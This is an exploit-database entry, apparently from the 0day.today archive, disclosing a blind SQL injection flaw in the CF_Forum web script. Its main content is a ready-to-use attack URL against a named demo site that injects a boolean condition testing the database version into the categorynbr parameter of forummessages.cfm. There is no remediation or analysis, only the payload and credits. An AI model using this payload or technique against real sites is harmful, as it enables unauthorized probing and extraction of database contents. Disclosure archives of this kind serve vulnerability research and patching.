id: 4411
date: 12/10/2008
title: CF_Forum Blind SQL Injection Vulnerability
author: AlpHaNiX
cves: 

==========================================
CF_Forum Blind SQL Injection Vulnerability
==========================================


###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : CF_FORUM
#download : null
#Demo     : http://www.cfmsource.com/forums/htdocs/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.cfmsource.com/forums/htdocs/forummessages.cfm?topicnbr=2&categorynbr=2%20and%20substring(@@version,1,1)=5

#Greetz For

###########################################################################



#  0day.today [2023-03-23]  #